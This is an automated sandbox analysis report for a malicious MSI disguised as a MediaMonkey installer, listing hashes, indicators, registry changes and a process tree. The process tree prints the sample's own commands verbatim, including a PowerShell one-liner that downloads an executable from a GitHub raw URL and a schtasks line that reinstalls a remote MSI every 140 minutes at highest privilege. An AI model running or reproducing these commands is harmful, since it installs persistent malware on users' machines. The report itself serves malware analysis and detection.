Analysis
-
max time kernel
121s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
15-06-2024 10:16
Static task
static1
Behavioral task
behavioral1
Sample
adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
Resource
win10v2004-20240508-en
General
-
Target
adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi
-
Size
248KB
-
MD5
adf35549a252723b8e392ef1643134d8
-
SHA1
0ecafc6cf721543057b7206c0816c106c919e961
-
SHA256
8306ac8c8238290885ea335365248c0ca13f5119a7eec7b030721b1a62a33f3a
-
SHA512
014f4bf78b0f4452580c83120267edf1a09006892a0357923aee7a83ebfa416ac233203c8889aed8ebd36a9b02b41707a3e706d5aca8124d5ce269b071ff2ec7
-
SSDEEP
3072:d39LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDOwqQ+cxbkRqMGOG:FuH2aCGw1ST1wrL5qv
Malware Config
Extracted
https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 3 3000 msiexec.exe 5 3000 msiexec.exe 6 2932 msiexec.exe 13 808 powershell.exe 14 808 powershell.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 13 raw.githubusercontent.com 14 raw.githubusercontent.com 12 raw.githubusercontent.com -
Drops file in Windows directory 10 IoCs
description ioc Process File created C:\Windows\Installer\f764b24.msi msiexec.exe File opened for modification C:\Windows\Installer\f764b24.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI4FB4.tmp msiexec.exe File opened for modification C:\Windows\Installer\f764b25.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\Installer\f764b25.ipi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI4F26.tmp msiexec.exe -
Loads dropped DLL 1 IoCs
pid Process 1856 MsiExec.exe -
pid Process 808 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1744 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 7064672a0dbfda01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{55C9BEB1-2B00-11EF-8414-4A4F109F65B0} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000088828619ee831140b2c7adedd43fced4000000000200000000001066000000010000200000003e403d5f51a71a216490c4aa3bf22aec7184aaebf777e60d76da7fefb221ecea000000000e800000000200002000000052b2ef755b4c1c85ef84e50b83acae503bf68956f6571f50b9dd84381c4b2b1490000000c15b7e808995cc21094d6dddc78a00c9ffc1c26bbfd88ac8f4bfe568d0e61d550ad32d39b7e85c5b8dc1165a3c4bdbb9ff4a3013f8a94d32bbf08dcc38dcb7cec45da5150229fc0fa976bc6b02abd32c6da2ae3259e932f45085360d1a3944d100c76327bd737e66141e620a61475770e465edb3648089797fd90e8992b6321da22203c828fd8f5b9ea1ef1b01aa116f4000000095fa12518ad53f7ca6dc9658f0ab3e10438b96de6263c293b0e925cd76b3b66e7524724b6b70b13e20aed4d8205c6d4da283c9b8b64f53fd5df180da97c8f333 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "424608459" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000088828619ee831140b2c7adedd43fced4000000000200000000001066000000010000200000005b1db17b50ecd55a120c6bf333b391f031812a67eec11887cf2fbe20b6042b63000000000e8000000002000020000000941ad3bda78e1f99c90d52f82e2523a7208af5c6befa53f38cbbb36e8a03f52120000000e43ee8f167e1cc83f8a7d1c7182d17711dbd2a5ac1105eb367b0cf23c248c0624000000042f7d903e319258b2e5cf44ec0e0dafef989e6981a482ffc22059d764cef5aea34d2524eb53804e8d38e370ae02d1ca668a52bebed440d68a190b631566886ce iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2932 msiexec.exe 2932 msiexec.exe 808 powershell.exe 808 powershell.exe -
Suspicious use of AdjustPrivilegeToken 62 IoCs
description pid Process Token: SeShutdownPrivilege 3000 msiexec.exe Token: SeIncreaseQuotaPrivilege 3000 msiexec.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe Token: SeSecurityPrivilege 2932 msiexec.exe Token: SeCreateTokenPrivilege 3000 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3000 msiexec.exe Token: SeLockMemoryPrivilege 3000 msiexec.exe Token: SeIncreaseQuotaPrivilege 3000 msiexec.exe Token: SeMachineAccountPrivilege 3000 msiexec.exe Token: SeTcbPrivilege 3000 msiexec.exe Token: SeSecurityPrivilege 3000 msiexec.exe Token: SeTakeOwnershipPrivilege 3000 msiexec.exe Token: SeLoadDriverPrivilege 3000 msiexec.exe Token: SeSystemProfilePrivilege 3000 msiexec.exe Token: SeSystemtimePrivilege 3000 msiexec.exe Token: SeProfSingleProcessPrivilege 3000 msiexec.exe Token: SeIncBasePriorityPrivilege 3000 msiexec.exe Token: SeCreatePagefilePrivilege 3000 msiexec.exe Token: SeCreatePermanentPrivilege 3000 msiexec.exe Token: SeBackupPrivilege 3000 msiexec.exe Token: SeRestorePrivilege 3000 msiexec.exe Token: SeShutdownPrivilege 3000 msiexec.exe Token: SeDebugPrivilege 3000 msiexec.exe Token: SeAuditPrivilege 3000 msiexec.exe Token: SeSystemEnvironmentPrivilege 3000 msiexec.exe Token: SeChangeNotifyPrivilege 3000 msiexec.exe Token: SeRemoteShutdownPrivilege 3000 msiexec.exe Token: SeUndockPrivilege 3000 msiexec.exe Token: SeSyncAgentPrivilege 3000 msiexec.exe Token: SeEnableDelegationPrivilege 3000 msiexec.exe Token: SeManageVolumePrivilege 3000 msiexec.exe Token: SeImpersonatePrivilege 3000 msiexec.exe Token: SeCreateGlobalPrivilege 3000 msiexec.exe Token: SeBackupPrivilege 1644 vssvc.exe Token: SeRestorePrivilege 1644 vssvc.exe Token: SeAuditPrivilege 1644 vssvc.exe Token: SeBackupPrivilege 2932 msiexec.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 1568 DrvInst.exe Token: SeLoadDriverPrivilege 1568 DrvInst.exe Token: SeLoadDriverPrivilege 1568 DrvInst.exe Token: SeLoadDriverPrivilege 1568 DrvInst.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe Token: SeDebugPrivilege 808 powershell.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe Token: SeRestorePrivilege 2932 msiexec.exe Token: SeTakeOwnershipPrivilege 2932 msiexec.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3000 msiexec.exe 304 iexplore.exe 3000 msiexec.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 304 iexplore.exe 304 iexplore.exe 844 IEXPLORE.EXE 844 IEXPLORE.EXE 844 IEXPLORE.EXE 844 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 2932 wrote to memory of 1856 2932 msiexec.exe 32 PID 1856 wrote to memory of 1084 1856 MsiExec.exe 33 PID 1856 wrote to memory of 1084 1856 MsiExec.exe 33 PID 1856 wrote to memory of 1084 1856 MsiExec.exe 33 PID 1856 wrote to memory of 1084 1856 MsiExec.exe 33 PID 1084 wrote to memory of 1068 1084 cmd.exe 35 PID 1084 wrote to memory of 1068 1084 cmd.exe 35 PID 1084 wrote to memory of 1068 1084 cmd.exe 35 PID 1084 wrote to memory of 1068 1084 cmd.exe 35 PID 1068 wrote to memory of 3064 1068 cmd.exe 36 PID 1068 wrote to memory of 3064 1068 cmd.exe 36 PID 1068 wrote to memory of 3064 1068 cmd.exe 36 PID 1068 wrote to memory of 3064 1068 cmd.exe 36 PID 3064 wrote to memory of 2040 3064 net.exe 37 PID 3064 wrote to memory of 2040 3064 net.exe 37 PID 3064 wrote to memory of 2040 3064 net.exe 37 PID 3064 wrote to memory of 2040 3064 net.exe 37 PID 1068 wrote to memory of 1744 1068 cmd.exe 38 PID 1068 wrote to memory of 1744 1068 cmd.exe 38 PID 1068 wrote to memory of 1744 1068 cmd.exe 38 PID 1068 wrote to memory of 1744 1068 cmd.exe 38 PID 1084 wrote to memory of 304 1084 cmd.exe 39 PID 1084 wrote to memory of 304 1084 cmd.exe 39 PID 1084 wrote to memory of 304 1084 cmd.exe 39 PID 1084 wrote to memory of 304 1084 cmd.exe 39 PID 1084 wrote to memory of 808 1084 cmd.exe 40 PID 1084 wrote to memory of 808 1084 cmd.exe 40 PID 1084 wrote to memory of 808 1084 cmd.exe 40 PID 1084 wrote to memory of 808 1084 cmd.exe 40 PID 304 wrote to memory of 844 304 iexplore.exe 42 PID 304 wrote to memory of 844 304 iexplore.exe 42 PID 304 wrote to memory of 844 304 iexplore.exe 42 PID 304 wrote to memory of 844 304 iexplore.exe 42 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\adf35549a252723b8e392ef1643134d8_JaffaCakes118.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3000
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 24A0861BC118DF4972B652DC81AD17DB2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\syswow64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\\MediaMonkey_4.1.21.1873\run.cmd" "3⤵
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\cmd.execmd /c "inst.cmd"4⤵
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Windows\SysWOW64\net.exenet session5⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session6⤵PID:2040
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "IZKCKOTP-6915" /tr "msiexec /ihttps://anicesicerom.com/2280324028 /q" /sc minute /mo 140 /rl highest /f5⤵
- Creates scheduled task(s)
PID:1744
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://player.go-mediamonkey.org/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:304 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:304 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:844
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$dl = New-Object System.Net.WebClient;$dl.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1)';$f = 'monkey_4.1.21.1873.exe'; $dl.DownloadFile('https://raw.githubusercontent.com/pavelenko/Media/master/MediaMonkey_4.1.21.1873.exe', $f);Stop-Process -Name powershell"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005B0" "00000000000003C0"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1568
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a1a63a0053fdd1b534c73f5046a175e2
SHA197387c1dcfec52c778cf8373bc9d4fbb469d1476
SHA256f96bfa21a9b30be61231d07a8d444bf47105be98052c4b663329efec2a2110d4
SHA5125a86c64f773aeb28acfa2d31910240ac67333261198f51fbaec543ea4dbc4081fb28649dbf5f9da97f9e196c9c9c0753862b34ea7a25e4c1ab199b957dbb4f51
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55d06ac61a0c17d457903ecc59a0c50fb
SHA190d09c94c84a4e7e27a3483cbf0c172e6561bb06
SHA2569aecf2bca2cba9e5444dd45975242cac8532811cd925759d93df6fe52cb5a990
SHA512ac7f00fc286a29f32749879e52ebc6c553ce761b9561ba9a00c9fc207d803a69472469aa91530315efb76713f2e04ed77c03c648b0a2cd848e7e210da1ffc1cd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD56e4bf6523e181cda05b7ef259e439f6d
SHA1deabf248b21283f1350f7d460ffeb954e30c0985
SHA2560e8f04c5e64d74b7402df4fe92610946de359e7c3c5eb77b993febf26b904904
SHA5128978ba580608bcefc6968b9e1159bbc93041d9b85a94672ccaf420d0ae2c6c553951d1b64997d448b6d7cb446d27f4fbbf54ce9b7c9480504747011281f52dc9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5449633337bfb3a8628ea6649381913d0
SHA1d5bda9d80f39a33f5867a33475fe71dff980799c
SHA256d7a57753e7958186a5e40b77c9a442cc7fee657121145a5b10758f8813636d46
SHA51217ce2396a2917923634e7ea611ef1702a102041154dc067373c013b2634e4cdc9dfd6c49e1aa8ac7230963aae274970b2621f331eeb3970b4c9087f13d2df296
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD509a1a55a61a9a90eb71ff1a963ef6324
SHA1c7c2d9fa6945d51e55eaa8d265b4c3c9338ee307
SHA2565a6c9fc23f4c42cc8e0d1fe4a712867d623f5c6602b7914811df2c0258e76d91
SHA51204d1972b231e575516d5aa605aca33e3e79b2aef8877e4839e6bf46bb7561690f9cc5a4db26be1a0e11fdc582b14c84544db3d56f375b42d3c2075e1fe432671
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD50fcb4daf21eb3fbd0a55c71c6037a494
SHA106268ecea8dd0aeef523a7fe33ece752167b9d3b
SHA2565a8d84e40a657922d73115f256cf48dc08e67f00a43d65dfd3bb01543ebcf399
SHA512396f3b4c1adf2e90e66656f05591dcfa9600833b9a1da51b48f4c4a8e54093873500556c27ea34de360dfca35c331d0e8fc0aec9a4e32596416e380e8d61776d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
